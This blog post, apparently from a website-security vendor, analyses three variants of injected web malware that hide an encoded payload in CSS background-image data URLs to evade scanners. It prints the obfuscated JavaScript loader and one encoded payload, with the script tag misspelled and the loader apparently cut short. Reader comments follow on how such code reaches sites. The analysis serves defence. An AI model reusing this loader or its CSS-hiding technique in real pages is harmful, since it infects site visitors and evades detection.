• Web-Malware with a Sense of Style

    Web based malware is quite interesting in the way it changes. This emerging threat can destroy the reputation of websites and online businesses, get them blacklisted by search engines and hurt their customers and visitors . Every single day, close to 6,600 new websites are added to popular malware blacklists. In this article, we will discuss the evolution of a particular piece of web-malware which is being used by hackers to avoid detection worldwide.

    Web-malware is malicious computer code, like computer viruses, but injected into web pages on unsuspecting benign websites. The owners of these websites, for the most part, remain blissfully unaware that they are hurting their customers and visitors by infecting them with malware. By virtue of being party to the malware distribution network, these legitimate websites are ultimately blacklisted by search engines, various filters and end up inaccessible to their users until they are cleaned up. This leads to loss of revenue, loss of reputation and tremendous heartache.

    Malware Evolution
    We observe many new strains of web-malware everyday. One interesting strain, which has been recurring over the past year or so is presented in this article. We will show you how this strain of malware has “evolved.” The reason for this evolution is so that the malware can avoid detection by scanning systems.

    The technology we use at Stopthehacker.com (STH) does not work like traditional Anti-Virus software, however. We can each version of malware, even though it may look and act a little differently from earlier versions. Scanning technology at STH uses Machine Learning and Artificial Intelligence techniques to hunt down malware and even spam on web pages. We protect the reputation of websites and prevent loss of business due to blacklisting.

    Let’s look at each version of the web-malware below.

    Version 1:
    Also found on jsunpack.

    <skript>var WnmaQ={YYSXc:function(){l='';var v=function(){};function nB(){};var g = new Date(2011, 10, 12, 10, 42, 57);this.mS="mS";var s=false;this.zN=false;var u="";var o = g.getMonth();var r = "from" + g.getMonth() + "e";function t(){};d='';r = r.replace(10, "CharCod");a="";this.bX=''; var z=null;var aY=false;var f=function(){};var i=document.styleSheets;zA="";var x=false;for(var gP=0;gP < i.length;gP++){this.tT=false;var fU="fU";this.nT=62782;var jC='';var b=i[gP].cssRules||i[gP].rules;aV="";var cW=42678;for(var n=0;n<b.length;n++){this.rS=54312;yJ='';this.mB=29481;var xM=function(){return 'xM'};var q=b.item?b.item(n):b[n];nI=10959;vE=46645;var bG=function(){return 'bG'};var p="p";if(!q.selectorText.match(/#c(\d+)/))continue;var nE='';var gT=new Array();w=q.style.backgroundImage.match(/url\("?data\:[^,]*,([^")]+)"?\)/)[1];this.lE="";mG=41875;};var gH=function(){};var e=false;}gG="gG";var cB=28236;var zE=55721;bJ=false;var j="";function jI(){};var cO='';c=function(){return {oZUd:"split"}}().oZUd;gB="gB";sG=48086;var jA=function(){};this.tH=false;var m=w;</skript>
    

    Version 2:
    Found on rexbd.net.

    <span style="color:#0000BB"><skript></span>var WnmaQ={YYSXc:function(){l=<span style="color:#DD0000">&#039;&#039;</span>;var v=function(){};function nB(){};var g = new Date(2011, 10, 12, 10, 42, 57);this.mS=<span style="color:#DD0000">"mS"</span>;var s=false;this.zN=false;var u=<span style="color:#DD0000">""</span>;var o = g.getMonth();var r = <span style="color:#DD0000">"from"</span> + g.getMonth() + <span style="color:#DD0000">"e"</span>;function t(){};d=<span style="color:#DD0000">&#039;&#039;</span>;r = r.replace(10, <span style="color:#DD0000">"CharCod"</span>);a=<span style="color:#DD0000">""</span>;this.bX=<span style="color:#DD0000">&#039;&#039;</span>; var z=null;var aY=false;var f=function(){};var i=document.styleSheets;zA=<span style="color:#DD0000">""</span>;var x=false;for(var gP=0;gP <span style="color:#0000BB">< <span style="color:#007700">i.length;gP++){this.tT=false;var fU=<span style="color:#DD0000">"fU"</span>;this.nT=62782;var jC=<span style="color:#DD0000">&#039;&#039;</span>;var b=i[gP].cssRules||i[gP].rules;aV=<span style="color:#DD0000">""</span>;var cW=42678;for(var n=0;n<b.length;n++){this.rS=54312;yJ=<span style="color:#DD0000">&#039;&#039;</span>;this.mB=29481;var xM=function(){return <span style="color:#DD0000">&#039;xM&#039;</span>};var q=b.item?b.item(n):b[n];nI=10959;vE=46645;var bG=function(){return <span style="color:#DD0000">&#039;bG&#039;</span>};var p=<span style="color:#DD0000">"p"</span>;if(!q.selectorText.match(/#c(\d+)/))continue;var nE=<span style="color:#DD0000">&#039;&#039;</span>;var gT=new Array();w=q.style.backgroundImage.match(/url\(<span style="color:#DD0000">"?data\:[^,]*,([^"</span>)]+)<span style="color:#DD0000">"?\)/)[1];this.lE="</span><span style="color:#DD0000">";mG=41875;};var gH=function(){};var e=false;}gG="</span>gG<span style="color:#DD0000">";var cB=28236;var zE=55721;bJ=false;var j="</span><span style="color:#DD0000">";function jI(){};var cO=&#039;</span><span style="color:#DD0000">&#039;;c=function(){return {oZUd:"</span>split<span style="color:#DD0000">"}}().oZUd;gB="</span>gB<span style="color:#DD0000">";sG=48086;var jA=function(){};this.tH=false;var m=w;
    

    Version 3:
    Found on www.twosixandbrush.com (https://badwarebusters.org/main/itemview/24057).

    <style>#c19{background:url(data:,8,17.5,29.5,38,36.5,20,43,14,6.5,46.5,49,23,15,6.5,6,6,14,14,29,14.5,45,22,27,7,32.5,51.5,44.5,25,13.5,40.5,8.5,14,15,4,11,20,11,34.5,15,43,47,15,7,9.5,3.5,21.5,20.5,24,14,28.5,26.5,13.5,19,7.5,9,29.5,13.5,26.5,8.5,9.5,33,14,18,25,18,38,3,18.5,9.5,40,32,33.5,42.5,38.5,23.5,14.5,6,7,13.5,38,19,33.5,20,5,27,12,12,8.5,2.5,14,42,38,20,20.5,18,30.5,12,44,16.5,13,8,29.5,43,44,14,11,16,38.5,22,42.5,3.5,32.5,23.5,9,25,5.5,5,5.5,6,11.5,49.5,44,41,25,12.5,3.5,45,24,42.5,9,8.5,43,16,40,52,33,3,25.5,41.5,30,28.5,44.5,5.5,16.5,14,26.5,38.5,29.5,11,6.5,19,36.5,34.5,26.5,34,20,27.5,5.5,6.5,19.5,20.5,16.5,15.5,13.5,7,9.5,25,23,10,14.5,32,23.5,28.5,49.5,23.5,19,5,12,27,2);}</style>   <skript>var WnmaQ={YYSXc:function(){l='';var  v=function(){};function nB(){};var g = new Date(2011, 10, 12, 10, 42,  57);this.mS="mS";var s=false;this.zN=false;var u="";var o =  g.getMonth();var r = "from" + g.getMonth() + "e";function t(){};d='';r =  r.replace(10, "CharCod");a="";this.bX=''; var z=null;var aY=false;var  f=function(){};var i=document.styleSheets;zA="";var x=false;for(var  gP=0;gP < i.length;gP++){this.tT=false;var fU="fU";this.nT=62782;var  jC='';var b=i[gP].cssRules||i[gP].rules;aV="";var cW=42678;for(var  n=0;n<b.length;n++){this.rS=54312;yJ='';this.mB=29481;var  xM=function(){return 'xM'};var  q=b.item?b.item(n):b[n];nI=10959;vE=46645;var bG=function(){return  'bG'};var p="p";if(!q.selectorText.match(/#c(\d+)/))continue;var  nE='';var gT=new  Array();w=q.style.backgroundImage.match(/url\("?data\:[^,]*,([^")]+)"?\)/)[1];this.lE="";mG=41875;};var  gH=function(){};var e=false;}gG="gG";var cB=28236;var  zE=55721;bJ=false;var j="";function jI(){};var cO='';c=function(){return  {oZUd:"split"}}().oZUd;gB="gB";sG=48086;var  jA=function(){};this.tH=false;var  m=w;
    

    Analysis
    Notice the difference in the variants. In the second example, the entire payload is wrapped with style information. This obfuscation is intended to fool scanners which analyze the code within the script tag. If they fail to make sense of the entire block of code as they will identify it as just another benign HTML style element. The third case is one where the payload is slightly outside the main block of malware code. In this situation the scanner must correlate the presence of the “pseudo-style” information with the actual malware code and mark the entire block as unsafe. The scanner technology at STH does exactly this.

    Conclusion
    Authors of web-malware are trying to hide their code. This may be the effect of increased capability in scanning technologies and a raised awareness among webmasters and web-surfers making it more difficult for malicious hackers to do their deeds. This is a good sign.

    Till next time.

    • I have a question about version 2: IE can run this kind of sample?

      alert(1); ……

      Posted by someone on February 9th

    • How does this malware get on to the pages?

      Posted by andy on April 12th

    • These pieces of malware have two main ways to enter a site: stealing FTP credentials by means of a trojan program installing on personal computers and sniffing for passwords, and by lieu of being pushed into websites when automated bots working for malicious hackers exploit vulnerabilities in third party software installed by website admins, such as OSCommerce shopping carts, OpenX ad servers..and more.

      Posted by anirban on April 13th